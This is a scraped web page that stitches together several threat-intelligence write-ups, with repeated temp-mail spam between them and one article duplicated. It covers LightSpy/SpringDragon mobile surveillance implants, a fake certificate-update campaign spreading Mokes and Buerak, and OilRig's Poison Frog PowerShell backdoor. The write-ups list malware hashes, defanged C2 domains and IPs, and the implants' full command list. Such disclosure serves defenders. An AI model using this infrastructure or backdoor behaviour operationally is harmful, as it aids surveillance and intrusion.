According to artefacts found in google cache, this link was distributed through Telegram channels “winuxhk” and “brothersisterfacebookclub”, and Instagram posts in late November 2019 with a message lure in Chinese translated as “The Hong Kong People Calendar APP is online ~~~ Follow the latest Hong Kong Democracy and Freedom Movement. Click to download and support the frontline. Currently only Android version is available.”

Further technical analysis of the packed APK reveals the timestamp of its actual build – 2019-11-04 18:12:33. Also it uses the subdomain, sharing an iOS implant distribution domain, as its c2 server – hxxp://svr.hkrevolution[.]club:8002.

Its code contains a link to another related domain:

Checking this server we found it hosted another related APK:

MD5 fadff5b601f6fca588007660934129eb
URL hxxp://movie.poorgoddaay[.]com/MovieCal[.]apk
C2 hxxp://app.poorgoddaay[.]com:8002
Build timestamp 2019-07-25 21:57:47

The distribution vector remains the same – Telegram channels:

The latest observed APK sample is hosted on a server that is unusual for the campaign context – xxinc-media[.]oss-cn-shenzhen.aliyuncs[.]com. We assume that the actors are taking steps to split the iOS and Android activities between different infrastructure pieces.

MD5 5d2b65790b305c186ef7590e5a1f2d6b
URL hxxps://xxinc-media.oss-cn-shenzhen.aliyuncs[.]com/calendar-release-1.0.1.apk
C2 hxxp://45.134.0[.]123:8002
Build timestamp 2020-01-14 18:30:30

We had not observed any indications of this URL being distributed in the wild yet.

If we take a look closer at the domain poorgoddaay[.]com that not only hosted the malicious APK but also was a C2 for them, we can note that there are two subzones of particular interest to us:

  • zg.poorgoddaay[.]com
  • ns1.poorgoddaay[.]com

We were able to work with partners to pivot into a handful of “evora” samples that use the above two subzones as their C2. Taking that a step further, using our Kaspersky Threat Attribution Engine (KTAE), we can see that the partner samples using those subzones are 99% similar to previous backdoors deployed by SpringDragon.

We are aware of other related and recent “evora” malware samples calling back to these same subnets while targeting organizations in Hong Kong as well. These additional factors help lend at least low confidence to clustering this activity with SpringDragon/LotusBlossom/Billbug.

Conclusion

This particular framework and infrastructure is an interesting example of an agile approach to developing and deploying surveillance framework in Southeast Asia. This innovative approach is something we have seen before from SpringDragon, and LightSpy targeting geolocation at least falls within previous regional targeting of SpringDragon/LotusBlossom/Billbug APT, as does infrastructure and “evora” backdoor use.

Indicators of Compromise

File hashes

payload.dylib
9b248d91d2e1d1b9cd45eb28d8adff71 (Jan 10, 2020)
4fe3ca4a2526088721c5bdf96ae636f4 (Feb 7, 2020)

ircbin.plist
e48c1c6fb1aa6c3ff6720e336c62b278 (Jan 10, 2020)

irc_loader
53acd56ca69a04e13e32f7787a021bb5 (Jan 10, 2020)

light
184fbbdb8111d76d3b1377b2768599c9 (Jan 10, 2020)
bfa6bc2cf28065cfea711154a3204483 (Feb 7, 2020)
ff0f66b7089e06702ffaae6025b227f0 (Mar 5, 2020)

baseinfoaaa.dylib
a981a42fb740d05346d1b32ce3d2fd53 (Jan 10, 2020)
5c69082bd522f91955a6274ba0cf10b2 (Feb 7, 2020)

browser
7b263f1649dd56994a3da03799611950 (Jan 10, 2020)

EnvironmentalRecording
ae439a31b8c5487840f9ad530c5db391 (Jan 10, 2020)
f70d6b3b44d855c2fb7c662c5334d1d5 (Feb 7, 2020)

FileManage
f1c899e7dd1f721265cc3e3b172c7e90 (Jan 10, 2020)
ea9295d8409ea0f1d894d99fe302070e (Feb 7, 2020)

ios_qq
c450e53a122c899ba451838ee5250ea5 (Jan 10, 2020)
f761560ace765913695ffc04dfb36ca7 (Feb 7, 2020)

ios_telegram
1e12e9756b344293352c112ba84533ea (Jan 10, 2020)
5e295307e4429353e78e70c9a0529d7d (Feb 7, 2020)

ios_wechat
187a4c343ff4eebd8a3382317cfe5a95 (Jan 10, 2020)
66d2379318ce8f74cfbd0fb26afc2084 (Feb 7, 2020)

KeyChain
db202531c6439012c681328c3f8df60c (Jan 10, 2020)

locationaaa.dylib
3e7094eec0e99b17c5c531d16450cfda (Jan 10, 2020)
06ff47c8108f7557bb8f195d7b910882 (Feb 7, 2020)

Screenaaa
35fd8a6eac382bfc95071d56d4086945 (Jan 10, 2020)
7b69a20920d3b0e6f0bffeefdce7aa6c (Feb 7, 2020)

ShellCommandaaa
a8b0c99f20a303ee410e460730959d4e (Jan 10, 2020)

SoftInfoaaa
8cdf29e9c6cca6bf8f02690d8c733c7b (Jan 10, 2020)

WifiList
c400d41dd1d3aaca651734d4d565997c (Jan 10, 2020)

Android malware
77ebb4207835c4f5c4d5dfe8ac4c764d
fadff5b601f6fca588007660934129eb
5d2b65790b305c186ef7590e5a1f2d6b

Past similar SpringDragon evora
1126f8af2249406820c78626a64d12bb
33782e5ba9067b38d42f7ecb8f2acdc8

Domains and IPs

Implant c2
45.134.1[.]180 (iOS)
45.134.0[.]123 (Android)
app.poorgoddaay[.]com (Android)
svr[.]hkrevolution[.]club (Android)

WebKit exploit landing
45.83.237[.]13
messager[.]cloud

Spreading
appledaily.googlephoto[.]vip
www[.]googlephoto[.]vip
news2.hkrevolution[.]club
news.hkrevolution[.]club
www[.]facebooktoday[.]cc
www[.]hkrevolt[.]com
news.hkrevolt[.]com
movie.poorgoddaay[.]com
xxinc-media[.]oss-cn-shenzhen.aliyuncs[.]com

Related subdomains
app.hkrevolution[.]club
news.poorgoddaay[.]com
zg.poorgoddaay[.]com
ns1.poorgoddaay[.]com

Full Mobile Device Command List

change_config
exe_cmd
stop_cmd
get_phoneinfo
get_contacts
get_call_history
get_sms
delete_sms
send_sms
get_wechat_account
get_wechat_contacts
get_wechat_group
get_wechat_msg
get_wechat_file
get_location
get_location_coninuing
get_browser_history
get_dir
upload_file
download_file
delete_file
get_picture
get_video
get_audio
create_dir
rename_file
move_file
copy_file
get_app
get_process
get_wifi_history
get_wifi_nearby
call_record
call_photo
get_qq_account
get_qq_contacts
get_qq_group
get_qq_msg
get_qq_file
get_keychain
screenshot


Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.

Mokes and Buerak distributed under the guise of security certificates – 10 minute mail

The technique of distributing malware under the guise of legitimate software updates is not new. As a rule, cybercriminals invite potential victims to install a new version of a browser or Adobe Flash Player. However, we recently discovered a new approach to this well-known method: visitors to infected sites were informed that some kind of security certificate had expired. Unsurprisingly, the update on offer was malicious.

We detected the infection on variously themed websites — from a zoo to a store selling auto parts. The earliest infections found date back to January 16, 2020.

Attack pattern

This is what visitors of any of the hacked websites saw:

The alarming notification consists of an iframe — with contents loaded from the third-party resource ldfidfa[.]pw — overlaid on top of the original page. The URL bar still displays the legitimate address. This is what the malicious piece of code inserted into the original HTML page looks like:

From the screenshot it can be seen that the script parameters depend on the referrer, user_agent, and cookie values of the user. While the following fixed values are used as the user_agent_X and timestamp_X strings:

  • user_agent_X = Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
  • timestamp_X = 1579118411.0231 (01/15/2020 @ 8:00pm (UTC))

The code inserted by the cybercriminal loads the external malicious script ldfidfa[.]pw/jquery.js?&up= &ts= &r= &u= &c=

Malicious jquery.js script

The jquery.js script overlays an iframe that is exactly the same size as the page. The iframe content is loaded from the address https[:]//ldfidfa[.]pw//chrome.html. As a result, instead of the original page, the user sees a seemingly genuine banner urgently prompting to install a certificate update.

Clicking the Install (Recommended) button on the banner initiates the download of the file Certificate_Update_v02.2020.exe, which we detect as Exploit.Win32.ShellCode.gen. Analysis of the file showed it to be Trojan-Downloader.Win32.Buerak, packed using Nullsoft Scriptable Install System. It is not the only malware distributed by the attackers. For example, Backdoor.Win32.Mokes was spread via the same campaign earlier in January.

IoC

Exploit.Win32.ShellCode.gen
B3290148681F8218ECB80CA430F9FDBA (Certificate_Update_v02.2020.exe)

Trojan-Downloader.Win32.Buerak
CE1931C2EB82B91ADB5A9B9B1064B09F

Backdoor.Win32.Mokes
094ADE4F1BC82D09AD4E1C05513F686D
F869430B3658A2A112FC85A1246F3F9D
5FB9CB00F19EAFBF578AF693767A8754
47C5782560D2FE3B80E0596F3FBA84D3

C&C
kkjjhhdff[.]site (47.245.30[.]255)
oderstrg[.]site


Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.

Mokes and Buerak distributed under the guise of security certificates – 10 minute mail

The technique of distributing malware under the guise of legitimate software updates is not new. As a rule, cybercriminals invite potential victims to install a new version of a browser or Adobe Flash Player. However, we recently discovered a new approach to this well-known method: visitors to infected sites were informed that some kind of security certificate had expired. Unsurprisingly, the update on offer was malicious.

We detected the infection on variously themed websites — from a zoo to a store selling auto parts. The earliest infections found date back to January 16, 2020.

Attack pattern

This is what visitors of any of the hacked websites saw:

The alarming notification consists of an iframe — with contents loaded from the third-party resource ldfidfa[.]pw — overlaid on top of the original page. The URL bar still displays the legitimate address. This is what the malicious piece of code inserted into the original HTML page looks like:

From the screenshot it can be seen that the script parameters depend on the referrer, user_agent, and cookie values of the user. While the following fixed values are used as the user_agent_X and timestamp_X strings:

  • user_agent_X = Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
  • timestamp_X = 1579118411.0231 (01/15/2020 @ 8:00pm (UTC))

The code inserted by the cybercriminal loads the external malicious script ldfidfa[.]pw/jquery.js?&up= &ts= &r= &u= &c=

Malicious jquery.js script

The jquery.js script overlays an iframe that is exactly the same size as the page. The iframe content is loaded from the address https[:]//ldfidfa[.]pw//chrome.html. As a result, instead of the original page, the user sees a seemingly genuine banner urgently prompting to install a certificate update.

Clicking the Install (Recommended) button on the banner initiates the download of the file Certificate_Update_v02.2020.exe, which we detect as Exploit.Win32.ShellCode.gen. Analysis of the file showed it to be Trojan-Downloader.Win32.Buerak, packed using Nullsoft Scriptable Install System. It is not the only malware distributed by the attackers. For example, Backdoor.Win32.Mokes was spread via the same campaign earlier in January.

IoC

Exploit.Win32.ShellCode.gen
B3290148681F8218ECB80CA430F9FDBA (Certificate_Update_v02.2020.exe)

Trojan-Downloader.Win32.Buerak
CE1931C2EB82B91ADB5A9B9B1064B09F

Backdoor.Win32.Mokes
094ADE4F1BC82D09AD4E1C05513F686D
F869430B3658A2A112FC85A1246F3F9D
5FB9CB00F19EAFBF578AF693767A8754
47C5782560D2FE3B80E0596F3FBA84D3

C&C
kkjjhhdff[.]site (47.245.30[.]255)
oderstrg[.]site


Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.

OilRig’s Poison Frog – old samples, same trick – 10 minute mail

After we wrote our private report on the OilRig leak, we decided to scan our archives with our YARA rule, to hunt for new and older samples. Aside from finding some new samples, we believe we also succeeded in finding some of the first Poison Frog samples.

Poison Frog

We’re not quite sure whether the name Poison Frog is the name given to the backdoor by the malware authors, or by the leakers. The fact is though, that one of the earliest Poison Frog samples we could find uses ‘poison-frog[.]club’ as the domain name for its C2.

But before we go there, let’s first take a look at a sample (MD5 4EA656D10BE1D6EAC05D69252D270592). This is a PE32 executable, written in C#. The C# code is not that interesting; its only functionality is to drop the PowerShell script (which contains the backdoors and is embedded within the executable), execute it and delete it afterwards. The same functionality (with occasional variations in the implementation) appears in all the PE32 samples we found.

The embedded PowerShell script follows the same logic as all the dropper PowerShell scripts we found. There are two long strings called dns_ag and http_ag (although the former is an empty string in this sample) that contain the DNS and HTTP backdoor (base64 encoded). As always, persistence is achieved by using the task scheduler utility.

After base64 decoding the DNS agent, and converting it from UTF16 to ASCII, we end up with the first version of the Poison Frog HTTP backdoor: a 59-line PowerShell backdoor. As you would expect from a 59-line backdoor written in PowerShell, its functionality is limited and its operation is rather simple.

First, it starts by calculating a UID based on the MAC address or the output of whoami. Then it sends the UID, surrounded by random numbers and/or encapsulated within the string 24351243510. Then, if a reply 11 characters long is received, the reply is sent back to the C2 followed by or prepended with a ‘1’. This reply is saved in a variable because it is used to determine what functionality is called by the C2. But first, the initial reply is sent back – this time followed by or prepended with a ‘3’.

Now, depending on the last character of the saved reply, the following actions take place:

If the last character is a ‘0’, the command specified in the reply is executed on the machine and the result is sent back to the C2;

If the last character is a ‘1’, the agent checks if the file specified in the reply exists on the system. If it doesn’t, a 404 is sent back; if it does, the file is sent to the server;

If a ‘2’ is received, the file is saved on the system at the location specified in the reply.

And that’s it. All in 59 lines.

Another sample we found is MD5 C9F16F0BE8C77F0170B9B6CE876ED7FB. It embeds one of the earliest versions of the DNS agent. In 335 lines of code it is able to execute commands on the system as well as save files to the system.

Poison Frog disguises

Installing malware on a system is not always easy. So the OilRig developers decided to pull a little trick and disguise the malware as the legitimate Cisco AnyConnect application. The backdoor is embedded in a similar way to that used in the samples above.

They made some small implementation mistakes, however. For example, the info popup appears every time you click on it, which doesn’t happen with the benign application.

The following message also helped fool users – it appeared when the connect button was clicked:

This may lead users to think there is something wrong with the application or their internet access, though in reality the backdoor is being silently installed on the system.

OilRig’s sloppiness

OilRig is not the most advanced APT actor, with several small mistakes made during the course of its activities.

For example, one sample failed to execute properly because of a typo (note the ‘Poweeershell.exe’ instead of ‘Powershell.exe’):

Also, many samples still had the PDB path inside the binary:

With other samples, they changed the compilation date to a future date – one that was after its release. For instance, one sample – 87FB0C1E0DE46177390DE3EE18608B21 – has a compilation date of 2018-07-25, though we found it on our systems a year earlier.

For more details and the latest information on OilRig, please contact [email protected]


Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.